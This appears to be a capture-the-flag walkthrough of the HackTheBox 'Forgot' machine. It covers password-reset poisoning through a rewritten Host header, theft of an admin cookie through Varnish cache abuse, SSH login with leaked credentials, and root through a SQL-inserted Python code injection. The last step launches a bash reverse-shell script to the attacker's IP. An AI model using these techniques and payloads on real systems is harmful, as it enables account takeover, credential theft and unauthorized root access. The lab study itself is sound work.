Forgot

Forgot is a medium rated difficulty Linux machine from HackTheBox created by MrR3boot. This box is pretty confusing and it’s pretty slow, you need a lot of patience to complete this one. In the current post my IP is 10.10.14.18 and the target’s IP is 10.129.228.104.

Gathering Information

This step is always the same, you must ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

Local Terminal
nmap -p- --open -T5 -v -n 10.129.228.104
Nmap’s output, just a website?
Local Terminal
nmap -sC -sV -p 22,80 10.129.228.104

It’s just a website, but there is something weird about it.

Local Terminal
whatweb http://10.129.228.104
Relevant information: Varnish 6.2, after exploring you should search about that.

  • Browser: http://10.129.228.104

Main page
Fragment of the main page source code (CTRL+U)

Add more information to your notes {user : robert-dev-14522}, still, we don’t have much information, so our best option is to fuzz the website and try to obtain more.

Local Terminal
wfuzz -c -t 200 –hc=404 -w /usr/share/wordlists/dirb/big.txt http://10.129.228.104/FUZZ
home, tickets, and reset. Interesting.

My target machine explodes, new target IP: 10.129.219.117

  • Browser: http://10.129.219.117/forgot

We can see that the website sends something to the user, we need to intercept it, by using one terminal, Burpsuite, and your browser.

User Interception Step

Before, from http://10.129.219.117 take the username of “robert-dev” using view:source (CTRL+U) or try curl http://10.129.219.117/ | grep “Q1 release fix by”

Local Terminal
nc -lvnp  443

  • Burpsuite: {INCERCEPT ON}

  • Browser: {username: robert-dev-14522} {PRESS RESET}

  • Burpsuite: Change host to your IP address and netcat port, like 10.10.14.18:443

Burpsuite modification

  • Burpsuite: {Press Forward}

  • Burpsuite: {Intercept OFF}

Wait around 1-2 minutes. at netcat you will receive this. Copy the token url.

  • Browser: http://10.129.219.117/reset?token=iATub9koGT1P79mowK2i%2B7zoJgnmsxWu1Fo4jWi0gPv8laTB3SzWbEPr8Om53r7Gcqt1Mu6U%2Bh4XqhSp7HoJ8A%3D%3D

Change password to anything (Here: pass123)

Now we have to login.

  • Browser: http://10.129.219.117

Home Portal

This machine have a timer where it changes the username of “robert-dev”, and it will fail if you are slow. Repeat everything from “User Interception Step”

http://10.129.219.117/tickets
http://10.129.219.117/escalation

Login through SSH

This version of Varnish have an issue with the cache (this was hard to find), we will use it to intercept and get the credentials to login directly to the machine.

view:source of home, /admin_tickets sounds like an important subdomain

First, we need to submit a ticket to a valid important URL from the machine plus a fictional directory, and the best place is static, where the .JS files are saved. After this, we will get the admin’s cookie to go to /admin_tickets

  • Browser: http://10.129.219.117/escalation

Submit!

Here you have to wait around two or three minutes, If you want now, you can retrieve your user cookie to compare, by using Burpsuite, intercepting a site like http://10.129.219.117/escalation while logged in.

And after waiting, we can get the cookie from the fictional page

Local Terminal
curl -I http://10.129.219.117/static/directory
Admin cookie, if this fails, repeats by summiting a new ticket with a new folder

Now that we have the administrator’s cookie, we have to use Burpsuite to change the cookie when going to /admin_tickets

  • Burpsuite {Intercept ON}

  • Browser: http://10.129.219.117/admin_tickets

  • Burpsuite {Replace Cookie}

  • Burpsuite {Forward}

  • Burpsuite {Intercept OFF}

And we are in! Look, there is an ssh issue

We have to try to login using these credentials, but before we notice that this website loves to add an Uppercase everywhere… so we are going to get the information from the source

view:source of /admin_tickets… {diego:dCb#1!x0%gjq}
Local Terminal
ssh diego@10.129.219.117                     #password: dCb#1!x0%gjq

Now our LocalTerminal [Term] is the Target Terminal [Diego]

Get the user.txt

Privilege Escalation

Now we want to become root, first we need to know what applications we can execute as root.

Target Terminal Diego
sudo -l
Target Terminal Diego
cat /opt/security/ml_security.py

By exploring the code, we found two things, it reads a MySQL data base, and by the version of TensorFlow, we can inject code in saved_model_cli to execute another bash file. I found an explanation and steps from this post.

It’s connected to SQL! Nice.
Target Terminal Diego
mysql -u diego -p          #pass: dCb#1!x0%gjq
Target Terminal Diego (SQL)
SHOW DATABASE;
use app;
show tables;
SELECT * from users;
app's Tables
Content of users table

Still, I couldn’t do anything else with this information…

Target Terminal Diego
cd /dev/shm
vi script.sh
Content of script.sh
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.18/443 0>&1
Target Terminal Diego
chmod 777 script.sh
mysql -u diego -p                 #pass: dCb#1!x0%gjq

From here, we need three terminal, two connected to the target as Diego, one to use the MySQL queries [MySQL], the other one to execute ml_security.py [Diego], and one Local Terminal [Term]

Target Terminal [MySQL]
use app;
insert into escalate values (“TEXT”,”TEXT”,”TEXT”,’hello=exec(“””\nimport os\nos.system(“/dev/shm/script.sh”)\nprint(“&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E”)”””)’);
Local Terminal [Term]
nc -nlvp 443
Target Terminal [Diego]
sudo /opt/security/ml_security.py
Now [Term] is [Root]
Target Root
cd /root
ls
cat root.txt
Root flag!
PreviousDevOopsNextJarvis

Last updated